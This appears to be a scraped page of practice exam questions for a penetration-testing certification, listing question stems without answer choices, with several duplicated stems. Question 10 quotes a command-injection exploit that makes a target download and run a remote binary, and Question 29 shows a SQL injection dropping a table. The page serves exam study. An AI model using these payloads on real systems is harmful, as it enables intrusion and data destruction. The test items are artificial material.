MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: Appending string values onto another string is called:
Question2: A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?
Question3: Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?
Question4: A penetration tester wrote the following script to be used in one engagement:Which of the following actions will this script perform?
Question5: A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?
Question6: A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
Question7: In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?
Question8: A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees.Which of the following tools can help the tester achieve this goal?
Question9: A penetration tester ran the following command on a staging server:python -m SimpleHTTPServer 9891Which of the following commands could be used to download a file named exploit to a target machine for execution?
Question10: A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:exploit = "POST "exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?
Question11: A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.Which of the following is most important for the penetration tester to define FIRST?
Question12: A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.In which of the following places should the penetration tester look FIRST for the employees' numbers?
Question13: A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
Question14: A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
Question15: A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?
Question16: Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
Question17: A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
Question18: A penetration tester obtained the following results after scanning a web server using the dirb utility:...GENERATED WORDS: 4612----Scanning URL: http://10.2.10.13/ ----+http://10.2.10.13/about (CODE:200|SIZE:1520)+http://10.2.10.13/home.html (CODE:200|SIZE:214)+http://10.2.10.13/index.html (CODE:200|SIZE:214)+http://10.2.10.13/info (CODE:200|SIZE:214)...DOWNLOADED: 4612 - FOUND: 4Which of the following elements is MOST likely to contain useful information for the penetration tester?
Question19: A penetration tester conducted a discovery scan that generated the following:Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?
Question20: A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
Question21: A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.Which of the following should the tester verify FIRST to assess this risk?
Question22: Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
Question23: An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information?
Question24: Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
Question25: A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?
Question26: A penetration tester obtained the following results after scanning a web server using the dirb utility:...GENERATED WORDS: 4612---- Scanning URL: http://10.2.10.13/ ----+ http://10.2.10.13/about (CODE:200|SIZE:1520)+ http://10.2.10.13/home.html (CODE:200|SIZE:214)+ http://10.2.10.13/index.html (CODE:200|SIZE:214)+ http://10.2.10.13/info (CODE:200|SIZE:214)...DOWNLOADED: 4612 - FOUND: 4Which of the following elements is MOST likely to contain useful information for the penetration tester?
Question27: When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?
Question28: A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.Which of the following would the tester MOST likely describe as a benefit of the framework?
Question29: A penetration tester conducted an assessment on a web server. The logs from this session show the following:http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Which of the following attacks is being attempted?
Question30: A company has hired a penetration tester to deploy and set up a rogue access point on the network.Which of the following is the BEST tool to use to accomplish this goal?
Question31: Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
Question32: You are a penetration tester running port scans on a server.INSTRUCTIONSPart 1: Given the output, construct the command that was used to generate this output from the available options.Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question33: A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:Have a full TCP connectionSend a "hello" payloadWalt for a responseSend a string of characters longer than 16 bytesWhich of the following approaches would BEST support the objective?
Question34: A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
Question35: A consulting company is completing the ROE during scoping.Which of the following should be included in the ROE?
Question36: During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.INSTRUCTIONSAnalyze the code segments to determine which sections are needed to complete a port scanning script.Drag the appropriate elements into the correct locations to complete the script.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question37: A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
Question38: A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.Which of the following Nmap scan syntaxes would BEST accomplish this objective?
Question39: You are a security analyst tasked with hardening a web server.You have been given a list of HTTP payloads that were flagged as malicious.INSTRUCTIONSGiven the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question40: Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?
Question41: Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
Question42: A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
Question43: Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
Question44: A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
Question45: A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.Which of the following should be included as a recommendation in the remediation report?
Question46: A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
Question47: A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?
Question48: A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:Which of the following tools will help the tester prepare an attack for this scenario?
Question49: A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
Question50: A penetration tester wrote the following script to be used in one engagement:Which of the following actions will this script perform?
Question51: A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
Question52: A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.Which of the following is the MOST important action to take before starting this type of assessment?